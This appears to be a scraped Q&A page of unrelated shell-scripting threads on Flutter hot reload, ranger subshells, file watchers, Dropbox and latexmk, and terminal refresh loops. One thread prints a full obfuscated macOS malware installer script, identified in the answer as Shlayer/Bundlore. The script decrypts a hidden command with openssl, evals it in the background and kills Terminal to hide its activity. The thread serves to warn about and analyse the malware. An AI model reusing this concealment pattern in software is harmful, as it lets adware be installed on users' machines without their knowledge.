Hot reload on save - macos

I'm currently using a terminal and vim on OSX as a development environment for Flutter. Things are going pretty well except that the app does not reload when I save any dart files. Is there a way to trigger that behavior?Currently I have to go to the terminal and hit "r" to see my changes.

Sorry for the plug, but I wrote a very simple plugin to handle this.
It makes use of Flutter's --pid-file command line flag to send it a SIGUSR1 signal.
You can achieve the same result as my two-line plugin by adding this to an autocmd
silent execute '!kill -SIGUSR1 "$(cat /tmp/flutter.pid)"'
And launching Flutter with the --pid-file flag.

I made a vim plugin hankchiutw/flutter-reload.vim based on killing with SIGUSR1.
You don't have to use --pid-file flag with this plugin. (Thanks to the pgrep :))
Simply execute flutter run, modify your *.dart file and see the reloading.

I did it with the excellent little tool called entr. On OS/X you can install it from brew: brew install entr. The home page of the tool is at http://eradman.com/entrproject/
Then you start flutter run with the pidfile as #nobody_nowhere suggests.
How do you run entr depends on the level of service. In the simplest case you just do find lib/ -name '*.dart' | entr -p kill -USR1 $(cat /tmp/flutter.pid)
But such invocation will not detect new files in the source tree (because find builds a list of files to watch only once, at the start). You can get away with slightly more complex one-liner:
while true
do
find lib/ -name '*.dart' | \
entr -d -p kill -USR1 $(cat /tmp/flutter.pid)
done
The -d option makes entr exit when it does detect a new file in one of the directories and the loop runs again.
I personally use even more complex approach. I use Redux and change to middleware or other state files does not work with hot reload, it doesn't pick up these changes. So you need to resort to hot restart.
I have a script hotrestarter.sh:
#!/bin/bash
set -euo pipefail
PIDFILE="/tmp/flutter.pid"
if [[ "${1-}" != "" && -e $PIDFILE ]]; then
if [[ "$1" =~ \/state\/ ]]; then
kill -USR2 $(cat $PIDFILE)
else
kill -USR1 $(cat $PIDFILE)
fi
fi
It checks if the modified file lives in /state subdirectory and if true does hot restart or else hot reload. I call the script like that:
while true
do
find lib/ -name '*.dart' | entr -d -p ./hotreloader.sh /_
done
The /_ parameter makes entr to pass the name of the file to the program being invoked.

You don't say what platform, but all platforms have a "watcher" app that can run a command when any file in a tree changes. You'll need to run one of those.

vscode has this feature. If you don't mind moving to vscode you can get it out of the box. You could also reach out to the author and see if they have any suggestions on how you could do it in vim or check the source directly. Most likely vim will have a mechanism to do so.

Related

How harmful is this command?

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.
Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.
It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection. This CrowdStrike blog post IDs it as Shlayer, and agrees that the payload is Bundlore.
Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).
BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.

How to recursively exit nested shells?

I use the Ranger file manager in my terminal to move around. Every time I use the S command to drop into a new directory, Ranger is actually launching a new shell. When I want to close a terminal window I need to run exit as many times as I have changed directories with Ranger. Is there a command that will run exit recursively for me until the window closes? Or better yet is there a different Ranger command to use?
Don't enter a sub-shell, just quit ranger and let the shell sync the directory back from ranger.
function ranger {
local IFS=$'\t\n'
local tempfile="$(mktemp -t tmp.XXXXXX)"
local ranger_cmd=(
command
ranger
--cmd="map Q chain shell echo %d > "$tempfile"; quitall"
)
${ranger_cmd[#]} "$#"
if [[ -f "$tempfile" ]] && [[ "$(cat -- "$tempfile")" != "$PWD" ]]; then
cd -- "$(cat "$tempfile")" || return
fi
command rm -f -- "$tempfile" 2>/dev/null
}
Press capital Q to quit ranger, after which the shell will sync directory automatically to the same one within ranger.
This is very flexible and you can use q to quit normally without syncing the dir back to the shell.
Update:
. ranger to open ranger is another solution, which is NOT recommended. Because compared with previous method, quitting from . ranger with q will always sync the dir back to the shell from ranger. You have no control on this behavior.
No real solution to this. It's oft requested but not as easy as people think.
You can source ranger, so start it like this . ranger. That'll cd to ranger's cwd when quitting.
References
Changing directories from ranger wiki
How to exit and cd into last dir you were on ranger? #1554
#Simba thanks for the great answer and the link to the docs.
In the end, the easiest answer was to just create an alias in my .bashrc like the docs recommend
alias ranger=". ranger"
Now when I use Q to quit, it automatically switches to the new directory, and only requires running exit one time to close the window.

Using inotifywait (or alternative) to wait for rsync transfer to complete before running script?

I would like to setup inotifywait so that it monitors a folder and when something is copied to this folder (lsyncd which uses rsync) I would like inotifywait to sit tight and wait until rsync is done before calling a script to process the new folder.
I have been researching online to see if someone is doing this but I am not finding much.
I'm not the most well versed with bash scripting though I understand some basics.
Here is a little script I found that pauses for a second but it still triggers a dozen events per transfer:
EVENTS="CLOSE_WRITE,MOVED_TO"
if [ -z "$1" ]; then
echo "Usage: $0 cmd ..."
exit -1;
fi
inotifywait -e "$EVENTS" -m -r --format '%:e %f' . | (
WAITING="";
while true; do
LINE="";
read -t 1 LINE;
if test -z "$LINE"; then
if test ! -z "$WAITING"; then
echo "CHANGE";
WAITING="";
fi;
else
WAITING=1;
fi;
done) | (
while true; do
read TMP;
echo $#
$#
done
)
I would be happy to provide more details or information.
Thank you.
Depending on what action you want to take, you may want to take a look at the tools provided by Watchman.
There are two that might be most useful to you:
If you want to initiate some action after the files are synced up, you may want to try using watchman-make. This is most appropriate if the action is to run a tool like make where the tool itself will look over the tree and produce its output (in other words: where you don't need to pass the precise list of changed files directly to your tool). You can have it run some other tool instead of make. There is a --settle option that you can use to have it wait a few moments after the latest file change notification before executing your tool.
watchman-make --make='process-folder.sh' -p '**/*.*'
watchman-wait is more closely related to inotifywait. It also waits for changes to settle before reporting files as changed, but because this tool doesn't coalesce multiple different file changes into a single event, the settle period is configured as a property of the tree being watched rather than as a command line parameter
Disclaimer: I'm the creator of Watchman

latexmk - running bash command to stop Dropbox syncing

I am using latexmk to compile my LaTeX thesis. I keep the thesis on my Dropbox, and as the dozens-to-hundreds of .aux and associated files are created, Dropbox indexing induces a significant overhead.
I thus want to insert the following bash script before compilation starts to stop Dropbox:
#!/usr/bin/env bash
dropbox_pid="$echo $(pgrep Dropbox)"
kill -STOP $dropbox_pid
and correspondingly, to restart Dropbox at the end, I would like:
#!/usr/bin/env bash
dropbox_pid="$echo $(pgrep Dropbox)"
kill -CONT $dropbox_pid
How do I do this by editing the local latexmkrc?
Not sure you will be able to send the SIGCONT signal from the latexmkrc ; isn't this file sourced before the compilation?
You could try to set a bash function such as:
compile () {
pkill -STOP Dropbox;
# compile_command "$#"
pkill -CONT Dropbox
}
Setting the working directories ($aux_dir and $out_dir) to somewhere outside the Dropbox repository, you can avoid excessive Dropbox syncing.
The following is from my $HOME/.latexmk. It locates the working directory under ~/.tmp/tex/THE_NAME_OF_MY_WRITING_PROJECT and tries to create it if it is not present.
$aux_dir = "$ENV{HOME}/.tmp/tex/" . basename(getcwd);
$out_dir = $aux_dir;
mkpath($aux_dir);

Bash script to show updating information in terminal

I'm trying to write a bash script that displays the output from a python script. I want the output refreshed every second, so my script looks like this (run.sh):
#!/bin/bash
export INTERVAL=1
export SCRIPT="something.py"
while [ true ]
do
clear
python ${SCRIPT}
sleep ${INTERVAL}
done
The screen, however, flickers while the python script works (there's some web access involved). How can I make this more sophisticated and wait for the script to finish before clearing what I used to have?
Thanks in advance!
Use watch. It will only update the screen when the entire script is done, and it'll take care of things like clearing the screen, and dealing with output that is larger than a single screen.
watch -n ${INTERVAL} 'python ${SCRIPT}'
If you want to see an example of how watch works with long-running tasks, do this:
watch 'date; echo; echo Long running task...; sleep 3; echo; date'
A quick way is to establish a temporary file:
tmpf=`mktemp`
while [ condition ]
do
python ${SCRIPT} > $tmpf
clear
cat $tmpf
sleep ${INTERVAL}
done
rm $tmpf
This requires you to do some cleanup on exit, though. Other than that I would suggest moving the whole loop into python because really, why not? You can use subprocess to fork out another shell and even get a more generic program.
Supplement:
You can make do with the trap builtin (here's an article on it) to do the cleanup automatically when you kill your script.
It's an ugly hack but doesn't use temporary files or fifo's:
a=$(clear; python ${SCRIPT})
echo $a
but seriously: the best way is to incorporate the screen clearing in your script. Give it a switch -clear or something like it.

Resources